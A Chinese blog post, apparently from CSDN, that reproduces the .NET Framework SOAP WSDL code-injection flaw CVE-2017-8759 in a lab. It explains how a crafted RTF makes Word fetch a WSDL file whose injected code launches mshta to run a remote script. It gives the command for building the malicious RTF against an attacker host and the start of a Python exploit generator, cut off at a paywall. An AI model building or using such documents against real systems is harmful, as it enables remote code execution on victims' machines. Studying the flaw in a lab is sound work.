.NET Framework漏洞(CVE-2017-8759)复现及后续渗透

最新推荐文章于 2024-05-25 09:56:46 发布
最新推荐文章于 2024-05-25 09:56:46 发布
阅读量7.1k 收藏 8
点赞数 4
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36360189/article/details/87920367
版权

参考:!bhdresh

简介

CVE-2017-8759是一个新型的Office文档高级威胁攻击漏洞,该漏洞允许恶意人士在解析SOAP WSDL的定义内容期间注入任意代码。FireEye公司对该微软Office文档进行了分析,并发现攻击者能够利用代码注入方式下载并执行一份包含PowerShell指令的Visual Basic脚本。黑客在Offcie文档中嵌入新的Moniker对象,利用的是.net库漏洞,在Office文档中加载执行远程的恶意.NET代码。

影响版本

影响到几乎所有旧版本的 .NET Framework。包括:

Microsoft .NET Framework 2.0 SP2

Microsoft .NET Framework 3.5

Microsoft .NET Framework 3.5.1

Microsoft .NET Framework 4.5.2

Microsoft .NET Framework 4.6

Microsoft .NET Framework 4.6.1

Microsoft .NET Framework 4.6.2

Microsoft .NET Framework 4.7

环境说明

虚拟机:VMware Fusion

攻击机操作系统:kali

攻击机ip:172.16.73.142

靶机操作系统:windows7 professional x86

靶机ip:172.16.73.140

渗透工具:metasploit,mimikatz,msfvenom

攻击原理

漏洞的整个攻击过程如下:

  1. 打开RTF文档(Word)

  2. RTF文档自动请求恶意SOAP Wsdl XML文档

  3. .NET Framework解析Wsdl XML为C#代码

  4. csc.exe将C#代码编译为dll

  5. Word加载dll执行恶意代码

​ 漏洞主要问题出现在 .NET Framework解析上,将远程的xml格式文件编译成c#执行的时候,解析模块中IsValidUrl函数没有正确处理XML中含有换行符的情况,导致调用者函数PrintClientProxy存在代码注入漏洞。

漏洞产生原因

函数PrintClientProxy在处理含有多个location的情况时,会将第一个location保留,其余的全部注释掉(图2红框部分)。然而,注释的处理代码没有考虑location中含有换行符的情况,导致换行符后的代码会被编译成可执行的C#代码。

打开生成的rtf文件请求的恶意soap wsdl xml文件如下:

19

在<soap:address location=“http://172.16.73.142?……>这里第一次调用IsValidUrl,传入参数location。

​ 下面的<soap:address location=”:

第二次调用IsValidUrl,传入参数是第二个location,第二个location带有换行符。System.Diagnostics.Process.Start方法会被注入。

生成的代码会被.NET框架的csc.exe编译,然后作为DLL加载到Office可执行程序中。之后编译出的C#代码,刚好注入了恶意代码生成了一个dll文件,

20

word加载编译后的dll。

用ultraedit打开该dll文件。在其中发现:

调用了System.Diagnostics.Process.Start函数,启动mshta.exe去执行远程恶意代码cmd.hta,

21

恶意的cmd.hta脚本嵌入在一个db后缀的二进制流文件中,在其中写入了shell。

复现过程

通过ifconfig查看攻击机ip。

1

通过python脚本生成恶意的rtf文件.

root@kali:~# python create.py -w test.rtf -u http://172.16.73.142/logo.txt

2

#!/usr/bin/env python
#coding:utf-8



import os,sys,thread,socket,sys,getopt,binascii,shutil,tempfile
from random import randint
from random import choice
from string import ascii_uppercase
from zipfile import ZipFile, ZIP_STORED, ZipInfo

def main(argv):

    global filename
    global docuri
    filename = ''
    docuri = ''
    #通过opt处理命令行参数输入

    opts, args = getopt.getopt(argv, "w:u",
                               ["filename=", "docuri="])
    for opt, arg in opts:


        if opt in ("-w", "--filename"):
            filename = arg
        elif opt in ("-u", "--docuri"):
            docuri = arg
    generate_exploit_rtf()
    sys.exit()

def generate_exploit_rtf():

    s=docuri
    docuri_hex = "00".join("{:02x}".format(ord(c)) for c in s) #docuri_hex通过读取攻击机ip,转为hex格式的地址。将内嵌一个连接到攻击地址的连接去下载执行shell。
    docuri_pad_len = 714 - len(docuri_hex)
    #填充
    docuri_pad = "0" * docuri_pad_len
    #生成的rtf文档内容,会自动请求恶意soap wsdl xml文档。
    payload = "{\\rtf1\\adeflang1025\\ansi\\ansicpg1252\\uc1\\adeff31507\\deff0\\st
最低0.47元/天 解锁文章
薛定谔的呱
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
asp.net4.7漏洞_ASP.NET安全漏洞
cunfuxiao7305的博客
09-25 1929
asp.net4.7漏洞This has been blogged about over and over. This is another case where if you had UrlScan or any decent security url filter installedon your box, you'd be fine. Certainly it's a problem ...
【网络安全】记一次项目中如何快速定位.net漏洞
HBohan的博客
04-13 502
一、寻找源码 通过询问管理员知道是个开源的系统,但是管理员并不确定具体的信息,就需要我们自己去寻找版权 首页信息查看源代码,根据页面关键字去某fa搜索,确定"/templates/web/netschool/corescripts/verify.js" 搜出来的相同站点比较多,根据案例里的连接挨个访问,在某个站底部发现版权为某厦商学院学习平台,知道版权就很容易找到源码了。 二、快速审计技巧 由于我不懂.net 所以审计只能靠一些简单技巧泛泛的寻找, 确定路由结构 【查看相关资料】 1、网络安全学习路线
微软.NET Framework cve-2017-8759 复现
weixin_30604651的博客
09-19 252
0x00 漏洞前言 FireEye公司最近发现一份恶意微软Office RTF文档,其中利用到一项SOAP WSDL解析器代码注入漏洞——编号CVE-2017-8759。该漏洞允许恶意人士在解析SOAP WSDL的定义内容期间注入任意代码。FireEye公司对该微软Office文档进行了分析,并发现攻击者能够利用代码注入方式下载并执行一份包含PowerShell指令的Visual ...
探索CVE-2017-8759漏洞利用样本:安全研究者的宝库
最新发布
gitblog_00062的博客
05-25 395
探索CVE-2017-8759漏洞利用样本:安全研究者的宝库 项目地址:https://gitcode.com/Voulnet/CVE-2017-8759-Exploit-sample 在这个数字化时代,网络安全是我们不能忽视的重要议题。而开源社区一直在努力揭示和应对各种潜在威胁,提供解决方案。今天,我们向你推荐一个独特的开源项目——CVE-2017-8759-Exploit-sample,它是一...
漏洞复现】SOAP WSDL解析器代码注入漏洞CVE-2017-8759
VI___
01-10 4590
一、CVE-2017-8759 ——类型:.NET Framework漏洞 https://www.freebuf.com/articles/system/147602.html 二、准备 攻击机:kali-2019 192.168.75.149 靶机:win7_x86(关闭防火墙) 192.168.75.139 三、复现过程 1、下载 exp,并将 cm...
探秘CVE-2017-8759:一款深度学习安全研究利器
gitblog_00015的博客
04-04 277
探秘CVE-2017-8759:一款深度学习安全研究利器 项目地址:https://gitcode.com/Lz1y/CVE-2017-8759 在网络安全的世界里,CVE(Common Vulnerabilities and Exposures)编号是识别和跟踪漏洞的关键,而CVE-2017-8759则是2017年一个著名的安全漏洞,它影响了微软的SharePoint服务器。现在,开发者Lz1y...
.net1.1的“漏洞”--杀手级的啊
净心编程
12-31 1664
今天在lake2的专栏里看到一贴,原文如下:“.net暗藏杀机?document.title=".net暗藏杀机? - "+document.title     有一回写了个VB.net的小程序,拿去放在空间上,然后用IE访问它(http://xxxx/x.exe)没想到程序居然直接运行了。原来当你的系统装了.net framework之后IE遇到.net程序就会自动执行而不是下载它。  
.net 跨站脚本攻击(XSS)漏洞的解决方案
笨笨鸟吃柠檬的专栏
09-06 7825
1.跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页中的恶意代码就会被执行。一般用来盗取浏览器cookie 2.跨站脚本攻击漏洞,英文名称Cross Site Scripting,简称CSS又叫XSS。它指的是恶意攻击者向Web页面中插入一段恶意代码,当用户浏览该页面时,嵌入到Web页面中的恶意代码就会被执行,从而达到恶意攻击者的特殊目的。 危害...
CVE-2017-8759-Exploit-sample-master
07-05
CVE-2017-8759-Exploit-sample-master,漏洞示例代码。
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。... 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -...
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
CVE-2017-8759-Exploit-sample:运行CVE-2017-8759利用示例
04-23
CVE-2017-8759-漏洞利用示例 运行CVE-2017-8759漏洞利用示例。 漏洞利用流程: Word宏在Doc1.doc文件中运行。 宏通过wsdl下载格式错误的txt文件,从而触发WSDL分析器日志。 然后,分析日志将导致运行mshta.exe,这...
.NET高级代码审计(第一课)XmlSerializer反序列漏洞
zls365365的博客
06-04 697
0X00 前言在.NET 框架中的 XmlSerializer 类是一种很棒的工具,它是将高度结构化的 XML 数据映射为 .NET 对象。XmlSerializer类在程序中通过单个 API 调用来执行 XML 文档和对象之间的转换。转换的映射规则在 .NET 类中通过元数据属性来表示,如果程序开发人员使用Type类的静态方法获取外界数据,并调用Deserialize反...
.NET配置文件的10大安全漏洞
weixin_30615767的博客
03-11 127
在ASP.NET应用程序在生产环境中部署时,需要检查Web.Config文件是否存在以下10个不正确的配置,可能导致安全漏洞: 1、Disabling custom errors Vulnerable: Secure: <configuration> ...
使用h-ui遇到的问题
松花江畔
03-29 5167
作为一个接触到这个框架不算是太久的初学者,我在使用这个框架的过程中遇到了不少的问题。现在总结起来大概是自己的开发经验不总的原因吧,为了减少帮助其他的刚刚接触到i这个框架的初学者的学习成本,同时记录下自己的所犯的错误,便于以后自己出线问题时进行错误的查找,故而记录下我的错误。        遇到的第一个问题:增加数据的时候弹出的框无法关闭,但是数据去插入到数据库里面去了,这个具体的原因我也不知道是什...
CVE-2017-8759 复现
m0_37923208的博客
11-23 816
漏洞成因:近日,360集团核心安全事业部分析团队发现一个新型的Office文档高级威胁攻击,攻击使用了9月12日补丁刚修复的.NET Framework漏洞,该漏洞在野外被利用时为0day状态,用户打开恶意的Office文档就会中招。该漏洞的技术原理和今年黑客“奥斯卡”Pwnie Awards上的最佳客户端漏洞CVE-2017-0199)如出一辙,不同的是,这次黑客在Offcie文档中嵌入新的M
cve-2017-7504漏洞复现
08-23
您好!对于CVE-2017-7504漏洞复现,请注意以下几个步骤: 1. 确认受影响的软件版本:CVE-2017-7504是一个Apache Struts 2框架中的远程代码执行漏洞。在复现之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 2. 搭建相应的环境:您可以在漏洞复现环境中使用Apache Struts 2漏洞测试框架,例如Metasploit或其他可用的漏洞测试工具。 3. 指定目标URL:使用合适的工具,指定目标URL以进行漏洞利用。通常,您需要提供目标系统上受影响的Struts 2应用程序的URL。 4. 发起攻击:使用漏洞利用工具执行相应的攻击代码。具体的攻击方法取决于您使用的工具和漏洞利用脚本。 请注意,漏洞复现属于未经授权的活动,可能违反法律法规,因此我们强烈建议仅在合法授权和合规测试范围内进行漏洞复现。此外,对于未经授权或非法目的使用该漏洞进行攻击是违法行为,且可能导致严重后果。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值